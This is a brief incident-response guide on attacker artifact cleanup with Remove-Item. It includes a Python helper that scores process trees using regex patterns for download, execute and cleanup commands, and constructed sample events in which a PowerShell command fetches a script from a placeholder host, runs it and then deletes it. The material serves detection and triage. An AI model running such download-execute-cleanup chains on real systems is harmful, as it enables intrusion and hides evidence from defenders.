Artifact cleanup behavior
Cleanup steps such as `Remove-Item` are often included to reduce user discovery and make later forensic review harder.
What to prioritize
- Telemetry first: pull process, network, and file events quickly, before retention windows or reboots erase useful detail.
- Look for partial failures: cleanup often misses prefetch files, command history, downloaded copies, or child artifacts.
Next actions
- Broaden the search: pivot on hashes, paths, and domains to find artifacts that survived the cleanup attempt.
- Escalate if combined: cleanup paired with download-and-execute behavior is a stronger malicious chain than either signal alone.
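One way to apply the "escalate if combined" rule above, as an added example that is not part of this note: a small Python triage helper that groups constructed process events by process tree and rates a tree higher when download, execute, and cleanup indicators all appear together. The event fields (`pid`, `ppid`, `cmd`) and the indicator keyword lists are assumptions, not any particular EDR's schema.

```python
"""Triage helper: correlate cleanup with download-and-execute in one process tree.

Added example; the event layout and keyword lists below are assumptions
to be adapted to the telemetry export actually in use.
"""
import re
from collections import defaultdict

# Indicator patterns (assumed; tune to the environment). Remove-Item is the
# cleanup cmdlet named in the note; the others are common equivalents.
DOWNLOAD = re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer", re.I)
EXECUTE = re.compile(r"Invoke-Expression|\bIEX\b|Start-Process|-File\b", re.I)
CLEANUP = re.compile(r"Remove-Item|\bdel\b|\brm\b", re.I)

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 4, "cmd": r"explorer.exe"},
    {"pid": 200, "ppid": 100, "cmd": r"powershell.exe -c Invoke-WebRequest https://example.invalid/a.ps1 -OutFile C:\Users\Public\a.ps1"},
    {"pid": 300, "ppid": 200, "cmd": r"powershell.exe -File C:\Users\Public\a.ps1"},
    {"pid": 400, "ppid": 200, "cmd": r"powershell.exe -c Remove-Item C:\Users\Public\a.ps1 -Force"},
    {"pid": 500, "ppid": 7, "cmd": r"powershell.exe -c Remove-Item C:\Temp\old.log"},
]


def tag_event(cmd):
    """Return the set of behaviour tags a single command line matches."""
    tags = set()
    if DOWNLOAD.search(cmd):
        tags.add("download")
    if EXECUTE.search(cmd):
        tags.add("execute")
    if CLEANUP.search(cmd):
        tags.add("cleanup")
    return tags


def root_of(pid, parent):
    """Walk ppid links to the topmost ancestor; the first pid not in the
    event set (an unobserved ancestor) serves as the tree key."""
    seen = set()
    while pid in parent and pid not in seen:
        seen.add(pid)
        pid = parent[pid]
    return pid


def score_trees(events):
    """Map each process tree to 'escalate', 'review', or 'low'.
    Download + execute + cleanup in the same tree is the chain the note
    says to escalate; cleanup beside only one of the others is worth a look."""
    parent = {e["pid"]: e["ppid"] for e in events}
    trees = defaultdict(set)
    for e in events:
        trees[root_of(e["pid"], parent)] |= tag_event(e["cmd"])
    results = {}
    for root, tags in trees.items():
        if {"download", "execute", "cleanup"} <= tags:
            results[root] = "escalate"
        elif "cleanup" in tags and tags & {"download", "execute"}:
            results[root] = "review"
        elif tags:
            results[root] = "low"
    return results
```

Running `score_trees(SAMPLE_EVENTS)` rates the tree under pid 4 as "escalate" and the lone Remove-Item under pid 7 as "low", which is the distinction the note draws between the combined chain and cleanup on its own.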